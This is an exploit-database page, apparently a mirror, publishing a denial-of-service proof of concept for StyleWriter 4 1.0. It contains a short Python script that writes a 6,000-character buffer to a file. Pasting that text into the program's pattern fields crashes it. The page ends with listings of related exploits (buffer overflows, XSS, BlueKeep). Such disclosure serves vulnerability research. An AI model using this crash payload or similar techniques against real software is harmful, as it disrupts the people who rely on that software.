Menu

Search for hundreds of thousands of exploits

"StyleWriter 4 1.0 - Denial of Service (PoC)"

Author

Exploit author

"Gionathan Reale"

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-08-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: StyleWriter 4 1.0 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-23
# Homepage: http://www.editorsoftware.com
# Software Link: http://www.editorsoftware.com/StyleWriter_Download.php
# Tested Version: 1.0
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "Tools" >"Add Pattern...". 
# Now in the new window paste the content of 
# "exploit.txt" into the following fields:"Pattern to Find" & "Advice Message". 
# Click "Add" and you will see a crash.

#!/usr/bin/python
   
buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-19 "Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free" remote windows_x86 0xeb-bp
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
Release Date Title Type Platform Author
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2018-12-11 "LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)" dos windows "Gionathan Reale"
2018-12-09 "Textpad 8.1.2 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "CrossFont 7.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "TransMac 12.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-25 "Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-17 "XAMPP Control Panel 3.2.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-14 "Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-14 "Faleemi Plus 1.0.2 - Denial of Service (PoC)" dos windows_x86-64 "Gionathan Reale"
2018-09-14 "InfraRecorder 0.53 - '.txt' Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-13 "Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-13 "Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)" local windows "Gionathan Reale"
2018-09-12 "jiNa OCR Image to Text 1.0 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "RoboImport 1.2.0.72 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "iCash 7.6.5 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "PicaJet FX 2.6.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "PDF Explorer 1.5.66.2 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "PixGPS 1.1.8 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-10 "Zenmap (Nmap) 7.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-07 "iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-08-29 "Immunity Debugger 1.85 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Easy PhotoResQ 1.0 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Drive Power Manager 1.10 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "HD Tune Pro 5.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Fathom 2.4 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-23 "StyleWriter 4 1.0 - Denial of Service (PoC)" local windows_x86 "Gionathan Reale"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.